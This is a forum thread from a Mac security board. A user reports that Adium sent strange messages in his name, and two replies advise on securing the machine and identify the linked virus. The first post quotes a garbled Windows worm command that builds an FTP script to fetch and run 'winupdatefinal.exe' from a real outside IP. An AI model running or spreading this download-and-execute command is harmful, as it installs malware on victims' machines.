Home User CP Donate Chat Register Today!  
  Get New posts Faq / Help?
   


Go Back   Hackint0sh > OSX and Hackint0sh/OSX86 > OSX Security

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 10-07-2008, 08:05 PM
pipesound
Status: Offline
Junior Member
 
Join Date: Dec 2007
Posts: 2
Rep Power: 0
pipesound is on a distinguished road
Default [PANIC] Possible Security Breach

so earlier this morning I was watching tv while my macbook pro was up and running in my bedroom. When I got back to it a classmate was messaging me through Adium, and for my surprise I WAS AUTOMATICALLY ANSWERING him. Well, not quite answering but there were 3 lines "I wrote" to him, they were as follows:

%systemroot%çsystem32çcmd.exe

del eq/echo open 201.75.69.44 6992 :: eq/echo user 9894 4767 :: eq /echo get winupdatefinal.exe :: eq /echo quit :: eq /ftp 'n 'sÑeq /winupdatefinal.exe /del eq

j

for your consideration, my active sharing services were:
screen sharing
file sharing
web sharing
ssh
bluetooth sharing

also I have noticed that since yesterday spotlight has gone insane indexing my hard drives, but I hardly think it's related to this "attack".

question is: am I in danger?
i'd appreciate some clues on what's going on with my mac.
thanks in advance,
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #2 (permalink)  
Old 02-05-2009, 05:21 AM
Napoleon
Status: Offline
Trial Member
 
Join Date: Feb 2009
Location: Niagara Falls, Canada
Posts: 2
Rep Power: 0
Napoleon is on a distinguished road
Default

I think it's safe to say that this is the result of someone gaining access to your system, either via screen sharing, or ichat. Are you on a wireless network? What's your encryption? If it's WPA2, great, but are you allowing guest access and is your password more than 10 characters?

I would immediatley disconnect from whatever network you're on, turn airport OFF, and run disk utility from finder/applications/utilities/disk utility...choosing Macintosh HD from left column, then click repair disk.
After that, i would delete all preferred networks, and change your network access information from either airport utility if you have an apple router, or from your router's software if it's 3rd party!

This is not something i have ever seen happen as a result of the OS itself acting up. Sorry and good luck!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #3 (permalink)  
Old 02-07-2009, 12:27 AM
JayBird's Avatar
JayBird
Status: Offline
Senior Member
 
Join Date: Oct 2008
Posts: 369
Rep Power: 23
JayBird will become famous soon enough
Default

sounds like a s/breach, have you checked the IP against WHOIS : Whois record for 201.75.69.44 - its an IP in Brazil. The port it is using is used by many P2P apps such as LIMEWIRE.

When searching Google for the EXE you mentioned: it IS LINKED TO A VIRUS:

winupdate.exe problem - Viruses, Spyware and other Nasties

you can normally tell if a virus is present it will masquerade as a normal file.
__________________
I Do Not Condone Piracy, If You Like It BUY IT! - It's Ok To Test But Not Steal - MacBook Pro Owner

iPhone Owner 3G
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
Sponsored links Remove advertisements
Advertisement
Advertisement

Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On




All times are GMT +2. The time now is 08:04 AM.



Powered by vBulletin® Version 3.8.2
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.3.2 Ad Management by RedTyger
follow us on Twitter!

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105